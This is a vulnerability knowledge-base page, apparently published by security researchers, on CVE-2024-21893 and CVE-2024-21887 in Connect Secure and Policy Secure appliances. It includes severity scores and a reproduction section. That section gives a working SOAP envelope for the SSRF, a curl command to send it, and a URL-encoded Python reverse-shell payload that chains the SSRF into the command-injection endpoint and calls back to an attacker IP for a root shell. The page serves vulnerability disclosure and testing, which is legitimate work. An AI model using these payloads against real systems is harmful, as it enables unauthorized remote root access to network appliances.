Knowledge Base

CVE-2024-21893 / CVE-2024-21887

Updated 26 May 2026

Background

SSRF in SAML Component

  1. CVSS
    8.2High
  2. VECTOR
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
  3. IMPACT
    Server-side request forgery, Unauthorized resource access
  1. AFFECTED
    Connect Secure9.x< 22.x
  2. Policy Secure9.x< 22.x
  3. Neurons for ZTAall

A server-side request forgery vulnerability in the SAML component allows an unauthenticated attacker to make the appliance issue arbitrary HTTP requests — including to internal services not exposed externally.

Background

Command Injection via License API

  1. CVSS
    9.1Critical
  2. VECTOR
    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
  3. IMPACT
    Remote code execution
  1. AFFECTED
    Connect Secure9.x< 22.x
  2. Policy Secure9.x< 22.x
  3. Neurons for ZTAall

A command injection vulnerability in the /api/v1/license/keys-status endpoint allows authenticated administrators to execute arbitrary commands on the appliance. The endpoint listens on localhost port 8090 without front-end authentication checks — making it reachable via SSRF without credentials.

Reproduction

POC || GTFO

When chained, the two vulnerabilities allow an unauthenticated attacker to achieve remote code execution.

Step 1 — Confirm SSRF (CVE-2024-21893)

Create a SOAP envelope (post_data.xml) with a RetrievalMethod URI pointing to an attacker-controlled listener:

xml
post_data.xml
<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                  xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig"
                  xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://192.168.86.35:4488/exploit.se"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>
zsh
curl -ik -X POST -H "Content-Type: text/xml" --data @post_data.xml https://192.168.86.111/dana-ws/saml20.ws

Capture the callback with netcat to confirm SSRF execution.

Step 2 — Chain to RCE (CVE-2024-21887)

Update the RetrievalMethod URI in the SOAP envelope to point at the internal license endpoint with a URL-encoded Python reverse shell payload, then send the same request:

http
http://127.0.0.1:8090/api/v1/license/keys-status/%3Bpython%20%2Dc%20%27import%20socket%2Csubprocess%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22192%2E168%2E86%2E35%22%2C4488%29%29%3Bsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%2Cstdin%3Ds%2Efileno%28%29%2Cstdout%3Ds%2Efileno%28%29%2Cstderr%3Ds%2Efileno%28%29%29%27%3B

This routes the SSRF through to the command injection endpoint, resulting in a root-level reverse shell on the target appliance.

References

Further reading